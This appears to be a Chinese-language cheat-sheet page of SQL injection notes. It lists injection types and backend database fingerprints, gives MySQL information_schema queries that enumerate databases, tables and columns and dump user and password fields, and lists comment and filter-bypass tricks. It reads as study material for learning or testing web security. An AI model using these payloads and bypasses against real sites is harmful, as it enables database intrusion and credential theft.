赞
踩
数字型注入
字符型注入
GET注入
POST注入
Cookie注入
报错注入
盲注
- 布尔盲注
- 时间盲注
union注入
宽字节注入
sql server #windows(iis)
mysql #apache
microsoft sql server #asp或.net
mysql #php
oracle/mysql #java
order by n #n是数字,通过改变n的值观察页面返回情况进而确定字段数
select schema_name from information_schema.schemata;
在版本大于等于5.0的mysql中数据库名放在information_schema的数据库下的schemata数据表中的schema_name字段中。
select database();
select group_concat(table_name) from information_schema.tables where table_schema=database();
select group_concat(column_name) from information_schema.columns where table_schema='users';
or
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users';
select group_concat(user,password) from users;
而mysql<5.0没有默认数据库information_schema,所以通常只能手工枚举,常用于盲注。
- #
- -- (有空格)
- --+
- /**/
- /*!...*/ 内联注释
- 逗号绕过
- 比较符合绕过(> , <)
- 逻辑符号替换 (and=&& , or=|| , xor=| , not=!)
- 空格绕过(括号,+号等)
- hex()、bin() = ascii()
- concat_wa() = group_concat()
- mid()、substr() = substring()
已无暇顾及过去,要向前走。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。